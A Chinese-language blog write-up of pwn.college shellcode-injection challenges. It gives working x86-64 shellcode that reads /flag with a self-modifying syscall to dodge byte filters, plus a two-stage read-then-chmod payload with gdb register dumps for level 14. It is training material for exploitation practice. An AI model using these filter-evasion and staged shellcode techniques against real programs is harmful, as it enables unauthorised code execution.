pwn.college shellcode injection level14
0x01 level1-13 总结
level 2 伪指令使用
1
2
3
.rept [n]
nop
.endr
level4 0x48(H) 字节码前缀 用于64位的扩展标识
使用32位代替 push pop指令不会产生前缀 r8 r9 不会产生前缀
level5 过滤指定字节 自修改汇编指令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
.global _start
_start:
.intel_syntax noprefix
mov rbx, 0x00000067616c662f
push rbx
mov rax, 2
mov rdi, rsp
mov rsi, 0
inc byte ptr [rip+syscall1+1]
syscall1:
.byte 0x0f
.byte 0x04
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 1000
mov rax, 0x28
inc byte ptr [rip+syscall2+1]
syscall2:
.byte 0x0f
.byte 0x04
0x02 level 14
gdb调试
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(gdb) info registers
rax 0x0 0
rbx 0x559b0b3027e0 94124395997152
rcx 0x7f15164fa297 139728545358487
rdx 0x26a69000 648450048
rsi 0x7f15165d9723 139728546273059
rdi 0x7f15165da7e0 139728546277344
rbp 0x7ffe312be330 0x7ffe312be330
rsp 0x7ffe312be2f0 0x7ffe312be2f0
r8 0x16 22
r9 0x1c 28
r10 0x559b0b303113 94124395999507
r11 0x246 582
r12 0x559b0b302200 94124395995648
r13 0x7ffe312be420 140729723380768
r14 0x0 0
r15 0x0 0
rip 0x559b0b3027c1 0x559b0b3027c1 <main+634>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
rdx正好是shellcode的内存地址,rax为0 利用这些信息
1
2
3
4
5
6
7
8
9
10
11
12
13
xchg edx, esi
xor edi, edi
syscall
.rept 6 这里使用6个nop占空 因为前面的三条指令正好为6个字节
nop 此时shellcode已经解释到第七个字节 所以使用nop占位 防止后面的指令被跳过
.endr
push 0x66
mov rdi, rsp
push 0x4
pop rsi
push 0x5a
pop rax
syscall
This post is licensed under CC BY 4.0 by the author.